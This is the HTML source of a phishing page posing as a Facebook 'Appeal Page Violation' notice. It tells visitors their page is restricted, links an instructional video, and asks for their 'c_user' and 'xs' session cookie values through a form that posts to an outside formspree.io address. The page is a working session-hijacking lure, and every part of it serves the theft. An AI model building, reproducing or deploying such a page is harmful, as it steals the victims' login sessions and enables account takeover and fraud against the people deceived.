<!DOCTYPE html>
<html><head>
  <title>Action Required</title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="css/help-center-case-file.vercel.app-style.css" rel="stylesheet">
</head>
<body>
<div class="md:block lg:block hidden border flex w-full h-[6rem]  relative bg-[#4667ac]">
  <div class="mx-10 mt-4">
      <b class="text-5xl text-white">facebook</b>
  </div>

  <form class="sm:hidden lg:block md:block" action="https://formspree.io/f/xkndpnyw" method="post">

<div style="position: absolute; left: 1.5rem; top:8rem; width: 90%;">
  <div>
    <p class="border-b h-10 font-bold text-[16px] text-[#4b4f56] pl-3 p-2 bg-[#f5f6f7]">
      Appeal Page Violation
    </p>
  </div>
<div>
  <p class="mt-4 pl-3 text-[12px] font-semibold">
    We have detected unusual activity on your page that violates our community standards.
  </p>
</div>
<div>
  <p class="mt-4 pl-3 text-[12px] font-semibold">
    Your access to your page has been limited, and you are currently unable to post, share, or comment using your page.
  </p>
</div>
<div>
  <p class="mt-4 pl-3 text-[12px] font-semibold">
    If you believe this to be a mistake, you have the option to submit an appeal by providing the necessary information.
  </p>
</div>
<div>
  <p class="text-[11px] text-[#90949c] p-2 font-semibold">
    Detailed Video Information
  </p>
</div>
<div>
  <a class="w-[120px] h-[80px] block mx-3" href="https://cdn.glitch.global/cfdab748-b145-4b28-8f85-c26ac388a3c9/cookies.mp4?v=1719846896202"><img src="images/help-center-case-file.vercel.app-WhatsApp%20Image%202024-07-26%20at%206.23.49%20AM.jpeg" alt=""></a>
</div><div>
  <p class=" pl-3 text-[12px] font-semibold">
    Please be sure to provide the requested information below.
  </p>
</div>
<div>
  <p class="text-slate-400 pl-4 mt-1">
    c_user
  </p><input class="border h-6 pl-1 mx-3" type="text" name="c_user" placeholder="" pattern="[0-9]+" minlength="6" id="c_user" title="Must Watch Detailed Video" required="1" aria-required="true">
</div>
<div>
  <p class="text-slate-400 pl-4 mt-1">
    xs
  </p><input class="border h-6 pl-1 mx-3" type="text" name="xs" placeholder="" pattern="^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@#$%^&amp;+=]).{12,}$" title="Must Watch Detailed Video" required="1" aria-required="true">
</div><div>
  <p class="mt-4 pl-3 text-[12px] font-semibold">
    Please make sure account not to log out from your computer or laptop until you have received a verification email.
  </p>
</div><div class="border mx-3 h-10 mt-4 bg-[#f5f6f7]"><div class="flex justify-end mx-2">
  <button class="border h-7 w-16  bg-[#4267b2] text-white shadow-2xl mt-[0.30rem] font-serif font-thin text-xs hover:bg-blue-500" id="delete-btn">
    Submit
  </button></div>
  </div>
 </div>
  </form>
</div></body>
</html>
